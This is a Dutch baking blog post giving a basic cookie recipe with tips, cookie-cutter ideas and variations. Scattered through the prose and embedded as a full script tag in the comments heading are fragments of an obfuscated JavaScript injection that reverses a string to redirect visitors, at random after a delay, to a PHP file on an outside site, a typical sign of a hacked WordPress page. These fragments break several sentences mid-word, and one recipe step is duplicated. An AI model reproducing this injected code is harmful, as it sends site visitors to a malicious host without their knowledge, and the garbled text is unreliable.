Koekjes bakken doe je zo! Het ideale basisrecept!

Altijd leuk om koekjes te bakken! Je kan zoveel leuke vormpjes krijgen tegenwoordig, het is werkelijk een feestje! Voor elke gelegenheid wat wils, er is altijd een excuus om koekjes te bakken! Als je ze bewaard in een goed afgedekte voorraadpot kun je ze dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot wel 4 weken lekker vers houden! Nu nog een handig basisrecept…

Zelf gemaakt koekjes staan altijd zo gezellig op tafel. Ik probeer altijd een grote voorraadpot vol te bakken, maar helaas blijft deze niet zo heel lang vol. Iedereen die langs loopt hapt lekker mee. Geeft niet! Als ze op zijn dan maak ik gewoon weer nieuwe. Alle ingrediënten heb ik eigenlijk altijd wel in huis. In de voorraad kast staan wel twintig weckpotten met bloem, suikers, pasta’s en rijst. En deze worden allemaal netjes aangevuld als ze leeg zijn. Het is net mijn eigen winkeltje. Wat een klein beetje bloem, boter en suiker wel niet voor lekkers kan maken.

Tips voor perfecte koekjes!

Eerder schreef ik al wat handige tips die je kunt lezen voordat je begint met bakken. Sommige tips zijn praktisch en zullen zeker van pas komen. Alles voor het perfecte, goudbruine koekje! Het is geen geheim dat er bij mij ook wel eens een koekje is aangebrand. Oefening baart kunst, maar eigenlijk is het gewoon heel erg makkelijk! Als je het basis recept een keer geoefend hebt kun je met dit recept goed variëren. Lees hiervoor ook de variatietips die onder aan het recept staan. Mijn persoonlijke favoriet is dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wel de chocolate chip cookie. Hiervoor hak ik grof wat witte en pure chocolade af van een chocoladereep en steek deze in het deeg. Werkelijk waar heerlijk!

Leuke Koekvormpjes!

Er zijn tegenwoordig zoveel verschillende koekvormpjes, echt zo leuk! Zo had ik laatst een vormpje gevonden van een koekhuisje die je op je theemok kan zetten. Erg decoratief en ook nog eens lekker. Ik heb de vormpjes nog niet geprobeerd, maar ik zal de fodom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to’s uiteraard delen!

Het leuke is dat je de vormpjes niet alleen hoeft te gebruiken voor koekjes. Je kunt er ook fondant, marsepein of zelfs bladerdeeg mee uitsteken om bijvoorbeeld taarten mee te bedekken. Door creatief te decoreren maak je hierdoor elke taart ook nog eens prachtig om naar te kijken.

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doriannn.blogspot.fr/2013/09/le-nouveau-750g-le-mag-est-arrive.html”]
Koekhuisje | Viving

Basisrecept Koekjes

Voorbereiding: 30 min.
Bereidingstijd: 15 min.
Afkoelen: 10 min.

Ingrediënten

 • 300 gram bloem
 • 1 eidooier
 • 150 gram witte basterdsuiker
 • 8 gram vanillesuiker
 • Mespuntje zout
 • 225 gram boter (kamertemperatuur)

Aan de slag!

 1. Verwarm de oven voor op 190 graden.
 2. Klop de boter samen met de suiker en de vanillesuiker.
 3. Klop vervolgens de eidooier ook door het mengsel.
 4. Voeg ook het bloem en een mespuntje zout toe en kneed het geheel tot een stevig deeg.
 5. Voeg ook het bloem en een mespuntje zout toe en kneed het geheel tot een stevig deeg.
 6. Laat het deeg goed afkoelen in de koelkast (ca. 30 minuten). Je kunt het deeg eventueel al in plakken rollen voordat je ze in de koelkast legt.
 7. Rol het deeg gelijkmatig met een deegroller uit (gebruik vershoudfolie of bakpapier) en snijd de koekjes uit met koekvormpjes of rol gelijkmatige balletjes. Leg de koekje op bakpapier op een bakplaat.
 8. Bak de koekjes vervolgens ca 15 min. af op 190 graden. Let op: Houd de koekje goed in de gaten. In de ene oven gaat dit harder dan de ander. Als de koekje een goedbruin randje hebben zijn ze gaar.

Variatie Tips

Voeg de volgende ingrediënten toe aan het deeg voor een lekkere twist! - Noten; eigenlijk kunnen je allerlei noten toevoegen zoals walnoten, amandelen, pinda's. Kies vooral wat je zelf lekker vindt! - Chocolade; witte, puur, melk, of zelf smarties! - Amandelspijs - Jam

Review

User Rating

5 (1 Votes)

Summary

Score

Geen Reacties op "Koekjes bakken <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>doe je zo! Het ideale basisrecept!"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.